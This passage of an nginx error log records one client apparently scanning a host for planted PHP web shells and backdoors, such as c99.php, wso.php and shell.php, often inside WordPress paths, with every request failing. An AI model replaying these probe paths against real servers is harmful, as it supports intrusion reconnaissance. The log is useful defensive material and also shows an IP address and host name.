"/var/www/html/rezor.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /rezor.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:55 [error] 357#357: *36719 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //doc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:55 [error] 357#357: *36719 open() "/var/www/html/wp-admin/user/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/user/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:55 [error] 357#357: *36719 open() "/var/www/html/wp-includes/css/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/css/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:55 [error] 357#357: *36719 open() "/var/www/html/install.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //install.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:55 [error] 357#357: *36719 open() "/var/www/html/~norapump/hah.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /~norapump/hah.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:55 [error] 357#357: *36719 open() "/var/www/html/sto.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /sto.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:55 [error] 357#357: *36719 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:55 [error] 357#357: *36719 open() "/var/www/html/test.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //test.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:55 [error] 357#357: *36719 "/var/www/html/wp-includes/blocks/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/blocks/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:56 [error] 357#357: *36719 open() "/var/www/html/n3.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /n3.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:56 [error] 357#357: *36719 open() "/var/www/html/wp-admin/install.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/install.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:56 [error] 357#357: *36719 open() "/var/www/html/o.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:56 [error] 357#357: *36719 open() "/var/www/html/wp-includes/ID3/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/ID3/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:56 [error] 357#357: *36719 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:56 [error] 357#357: *36719 "/var/www/html/.trash7309/f/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /.trash7309/f/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:56 [error] 357#357: *36719 open() "/var/www/html/wp.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:56 [error] 357#357: *36719 open() "/var/www/html/wp-includes/customize/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/customize/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:56 [error] 357#357: *36719 open() "/var/www/html/wp-content/themes/seotheme/mar.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/seotheme/mar.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:57 [error] 357#357: *36719 open() "/var/www/html/h.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //h.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:57 [error] 357#357: *36719 open() "/var/www/html/skin/install/default/security.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //skin/install/default/security.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:57 [error] 357#357: *36719 open() "/var/www/html/wrt.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wrt.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:57 [error] 357#357: *36719 open() "/var/www/html/wp-content/plugins/Core-EconX/up.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/plugins/Core-EconX/up.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:57 [error] 357#357: *36719 "/var/www/html/wp-includes/css/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/css/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:57 [error] 357#357: *36719 open() "/var/www/html/images/c99.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /images/c99.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:57 [error] 357#357: *36719 open() "/var/www/html/png.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /png.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:57 [error] 357#357: *36719 open() "/var/www/html/wp-includes/ID3/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/ID3/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:57 [error] 357#357: *36719 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:58 [error] 357#357: *36719 open() "/var/www/html/wp-content/languages/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/languages/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:58 [error] 357#357: *36719 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:58 [error] 357#357: *36719 open() "/var/www/html/wp/wp-includes/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp/wp-includes//index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:58 [error] 357#357: *36719 open() "/var/www/html/ton.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ton.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:58 [error] 357#357: *36719 open() "/var/www/html/wso.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:58 [error] 357#357: *36719 "/var/www/html/images/fk2e3/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /images/fk2e3/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:58 [error] 357#357: *36719 open() "/var/www/html/a2.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /a2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:58 [error] 357#357: *36719 open() "/var/www/html/shell.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /shell.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:58 [error] 357#357: *36719 open() "/var/www/html/wp-includes/IXR/moon.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/IXR/moon.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:58 [error] 357#357: *36719 open() "/var/www/html/sxo.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /sxo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:59 [error] 357#357: *36719 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:59 [error] 357#357: *36719 "/var/www/html/wp-admin/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:59 [error] 357#357: *36719 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:59 [error] 357#357: *36719 open() "/var/www/html/mans.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /mans.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:59 [error] 357#357: *36719 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //dropdown.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:59 [error] 357#357: *36719 "/var/www/html/WordPress/x/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /WordPress/x/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:59 [error] 357#357: *36719 open() "/var/www/html/ze.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ze.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:59 [error] 357#357: *36719 open() "/var/www/html/geck.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //geck.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:58:59 [error] 357#357: *36719 open() "/var/www/html/menu.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /menu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:00 [error] 357#357: *36719 open() "/var/www/html/admin/function.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //admin/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:00 [error] 357#357: *36719 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //index/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:00 [error] 357#357: *36719 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:00 [error] 357#357: *36719 open() "/var/www/html/ftp.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ftp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:00 [error] 357#357: *36719 open() "/var/www/html/mds.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /mds.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:00 [error] 357#357: *36719 open() "/var/www/html/ahax.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ahax.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:00 [error] 357#357: *36719 open() "/var/www/html/wp-admin/class-db.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/class-db.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:00 [error] 357#357: *36719 open() "/var/www/html/cool.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /cool.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:00 [error] 357#357: *36719 open() "/var/www/html/gm.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /gm.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:01 [error] 357#357: *36719 open() "/var/www/html/simple.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //simple.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:01 [error] 357#357: *36719 open() "/var/www/html/elp.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //elp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:01 [error] 357#357: *36719 open() "/var/www/html/bolt.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /bolt.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:01 [error] 357#357: *36719 open() "/var/www/html/wp-content/uploads/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/uploads/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:01 [error] 357#357: *36719 open() "/var/www/html/inputs.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //inputs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:01 [error] 357#357: *36719 "/var/www/html/.trash7309/fafa/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /.trash7309/fafa/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:01 [error] 357#357: *36719 open() "/var/www/html/system.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /system.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:01 [error] 357#357: *36719 "/var/www/html/wp-admin/maint/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:01 [error] 357#357: *36719 "/var/www/html/wp-admin/network/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/network/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:02 [error] 357#357: *36719 open() "/var/www/html/museu/yhweq.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /museu/yhweq.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:02 [error] 357#357: *36719 open() "/var/www/html/an.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /an.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:02 [error] 357#357: *36719 open() "/var/www/html/w.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //w.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:02 [error] 357#357: *36719 open() "/var/www/html/gmo.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /gmo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:02 [error] 357#357: *36719 open() "/var/www/html/gib.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /gib.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:02 [error] 357#357: *36719 open() "/var/www/html/wp-miiss.php.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-miiss.php.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:02 [error] 357#357: *36719 open() "/var/www/html/ho/wpup.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ho/wpup.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:02 [error] 357#357: *36719 open() "/var/www/html/moon.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //moon.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:02 [error] 357#357: *36719 open() "/var/www/html/filesss.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /filesss.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:03 [error] 357#357: *36719 open() "/var/www/html/hey.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /hey.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:03 [error] 357#357: *36719 open() "/var/www/html/wp-content/themes/seotheme/mar.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/seotheme/mar.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:03 [error] 357#357: *36719 open() "/var/www/html/1337.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //1337.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:03 [error] 357#357: *36719 open() "/var/www/html/buy.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //buy.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:03 [error] 357#357: *36719 open() "/var/www/html/apsarasarts/okk.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /apsarasarts/okk.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:03 [error] 357#357: *36719 open() "/var/www/html/m.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /m.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:03 [error] 357#357: *36719 open() "/var/www/html/wp-is.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-is.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:03 [error] 357#357: *36719 open() "/var/www/html/jmfi2.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /jmfi2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:03 [error] 357#357: *36719 open() "/var/www/html/about/function.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //about/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:03 [error] 357#357: *36719 open() "/var/www/html/bnn_.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /bnn_.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:04 [error] 357#357: *36719 open() "/var/www/html/wp-content/json.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/json.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:04 [error] 357#357: *36719 open() "/var/www/html/hzz.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /hzz.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:04 [error] 357#357: *36719 open() "/var/www/html/shell20211028.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //shell20211028.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:04 [error] 357#357: *36719 open() "/var/www/html/content.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //content.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:04 [error] 357#357: *36719 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-content/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:04 [error] 357#357: *36719 open() "/var/www/html/ps.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ps.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:04 [error] 357#357: *36719 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:04 [error] 357#357: *36719 "/var/www/html/.trash7309/dd/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /.trash7309/dd/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:04 [error] 357#357: *36719 open() "/var/www/html/cache.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /cache.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:05 [error] 357#357: *36719 open() "/var/www/html/ss.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ss.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:05 [error] 357#357: *36719 open() "/var/www/html/p.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /p.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:05 [error] 357#357: *36719 open() "/var/www/html/wp-content/plugins/achdxhv/languages/admin.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/plugins/achdxhv/languages/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:05 [error] 357#357: *36719 open() "/var/www/html/user.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //user.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:05 [error] 357#357: *36719 "/var/www/html/wp-includes/block-patterns/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/block-patterns/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:05 [error] 357#357: *36719 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //index/function.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:05 [error] 357#357: *36719 open() "/var/www/html/wp.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:05 [error] 357#357: *36719 open() "/var/www/html/rip.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /rip.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:05 [error] 357#357: *36719 open() "/var/www/html/wp4.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:06 [error] 357#357: *36719 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //403.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:06 [error] 357#357: *36719 open() "/var/www/html/wp-admin/maint/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/maint/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:06 [error] 357#357: *36719 open() "/var/www/html/asd67.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /asd67.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:06 [error] 357#357: *36719 open() "/var/www/html/sad/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //sad/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:06 [error] 357#357: *36719 open() "/var/www/html/oivcl.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /oivcl.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:06 [error] 357#357: *36719 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:06 [error] 357#357: *36719 open() "/var/www/html/wp-content/themes/deeto/login.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/deeto/login.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:06 [error] 357#357: *36719 open() "/var/www/html/v2.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /v2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:06 [error] 357#357: *36719 open() "/var/www/html/wp-content/themes/hideo/network.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/hideo/network.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:07 [error] 357#357: *36719 "/var/www/html/x/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /x/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:07 [error] 357#357: *36719 open() "/var/www/html/.cache/x.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //.cache/x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:07 [error] 357#357: *36719 open() "/var/www/html/dr.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /dr.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:07 [error] 357#357: *36719 open() "/var/www/html/raw.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /raw.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:07 [error] 357#357: *36719 open() "/var/www/html/wp-includes/css/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/css/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:07 [error] 357#357: *36719 open() "/var/www/html/wp-content/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:07 [error] 357#357: *36719 open() "/var/www/html/ioxi-o2.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:07 [error] 357#357: *36719 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /dropdown.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:07 [error] 357#357: *36719 open() "/var/www/html/dlu.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /dlu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:08 [error] 357#357: *36719 open() "/var/www/html/wp-content/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/29 07:59:08 [error] 357#357: *36719 open() "/var/www/html/db.php" failed (2: No such file or directory), client: 172.190.142.176, 